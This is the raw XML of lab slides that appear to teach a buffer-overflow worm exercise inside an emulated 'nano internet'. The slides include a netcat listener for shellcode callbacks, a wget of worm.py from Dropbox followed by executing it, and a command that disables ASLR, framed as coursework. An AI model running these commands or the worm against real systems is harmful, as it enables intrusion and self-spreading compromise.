                <p:cNvPr id="9" name="Ink 8">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCD883A8-63EE-5A27-DBDF-E4019AEDFB0F}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId6"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="831581" y="2599888"/>
                  <a:ext cx="638280" cy="268987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8848177B-1F62-84EC-5DDA-EDC39185A5F0}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1212101" y="5085158"/>
                <a:ext cx="218520" cy="325800"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="10" name="Ink 9">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8848177B-1F62-84EC-5DDA-EDC39185A5F0}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId8"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1194101" y="5070268"/>
                  <a:ext cx="254160" cy="355283"/>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FE3EAB47-8BE7-ED5D-6220-9A20C1086DC3}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6831928" y="4931438"/>
              <a:ext cx="340560" cy="202320"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="14" name="Ink 13">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE3EAB47-8BE7-ED5D-6220-9A20C1086DC3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId10"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="6822928" y="4922438"/>
                <a:ext cx="358200" cy="219960"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="Group 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BED54D2-26DC-CD63-4614-137D7DF835F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7202368" y="4371278"/>
            <a:ext cx="489960" cy="628560"/>
            <a:chOff x="7202368" y="4371278"/>
            <a:chExt cx="489960" cy="628560"/>
          </a:xfrm>
        </p:grpSpPr>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CFE0DFA4-BF83-0268-BB22-B9CFA23EB686}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7223248" y="4371278"/>
                <a:ext cx="469080" cy="605520"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="15" name="Ink 14">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFE0DFA4-BF83-0268-BB22-B9CFA23EB686}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId12"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7214248" y="4362638"/>
                  <a:ext cx="48672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4C2FFCB7-D171-D9B4-B065-103567072746}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7202368" y="4924598"/>
                <a:ext cx="127800" cy="75240"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="16" name="Ink 15">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C2FFCB7-D171-D9B4-B065-103567072746}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId14"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7193368" y="4915958"/>
                  <a:ext cx="145440" cy="92880"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{123D02E8-C866-4D33-B8D0-097C6A2501BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7828547" y="4186989"/>
            <a:ext cx="1531830" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Must be 9090 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="21" name="Group 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{980E2DA9-D13A-6E31-2B8A-E484C85EDD0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5853808" y="5534078"/>
            <a:ext cx="2235960" cy="578880"/>
            <a:chOff x="5853808" y="5534078"/>
            <a:chExt cx="2235960" cy="578880"/>
          </a:xfrm>
        </p:grpSpPr>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2617C798-40A2-D903-4DB6-7D8D26F3AE53}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5853808" y="5893358"/>
                <a:ext cx="354600" cy="219600"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="19" name="Ink 18">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2617C798-40A2-D903-4DB6-7D8D26F3AE53}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId16"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5845168" y="5884718"/>
                  <a:ext cx="372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2EB760C6-7509-5422-71BB-DA21AD857C33}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6191848" y="5534078"/>
                <a:ext cx="1897920" cy="361440"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="20" name="Ink 19">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EB760C6-7509-5422-71BB-DA21AD857C33}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId18"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6183208" y="5525438"/>
                  <a:ext cx="1915560" cy="37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540A52C7-B290-A725-C11D-19A06A79B0E7}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7964488" y="5413838"/>
              <a:ext cx="171360" cy="244080"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="22" name="Ink 21">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{540A52C7-B290-A725-C11D-19A06A79B0E7}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId20"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7955848" y="5404838"/>
                <a:ext cx="189000" cy="261720"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7393FB08-F17C-4F58-6E9E-C508E7A7021C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8221578" y="5233824"/>
            <a:ext cx="2862982" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Must be the same as the command in shellcode  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{621BEF43-64C7-4F45-308A-7F74D9355372}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9360377" y="4944978"/>
            <a:ext cx="1745938" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lnv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>9999</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1250630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01BB9-44A0-5967-3C96-1F3A281AAB00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="365584" y="477959"/>
            <a:ext cx="8003246" cy="214466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B83F8A3-E199-3897-CA34-45F668724E8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5866978" y="2622620"/>
            <a:ext cx="6253719" cy="414014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CF60C47-953F-D2D6-A6EE-F50B146DA4DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5150371" y="1180957"/>
            <a:ext cx="1433213" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>launch attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDE8AC43-0670-64E3-B7EC-BB5164A50C46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4059246" y="3912215"/>
            <a:ext cx="1807731" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Observe nano internet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="931481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9CBEF-D098-2AF5-79E1-08869833C972}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2405851" y="0"/>
            <a:ext cx="7380298" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="181406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C38311-350C-189C-74E9-CD74CFF3B78E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="974338" y="2354135"/>
            <a:ext cx="9792232" cy="2431435"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Shunt down the nano internet and visualization server. In</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ../nano </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ../map </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>folders</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dcdown</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>You can download </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>worm.p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>y. Make sure you change it to executable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.dropbox.com/s/phghmrp8sc0r3pf/worm.py</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> +x worm.py</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ ./worm.py</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5656A1CA-B9BD-FC4D-881A-B8EE196B214E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Clean up</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="277563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62EC-F1BB-E26E-D81A-9A820B1AD80B}"/>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09FEE61A-E4EB-34BC-0073-ECF09ACCADB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Did you turn memory randomization off</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sysctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kernel.randomize_va_space</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Your $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and &amp;buffer may differ from the demo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Is the shellcode format correct?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Did you change the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>worm.py </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>permission if you download the solution directly from Dropbox?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Is your nano internet running?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Is your map server on?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Are you monitoring the nano internet?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
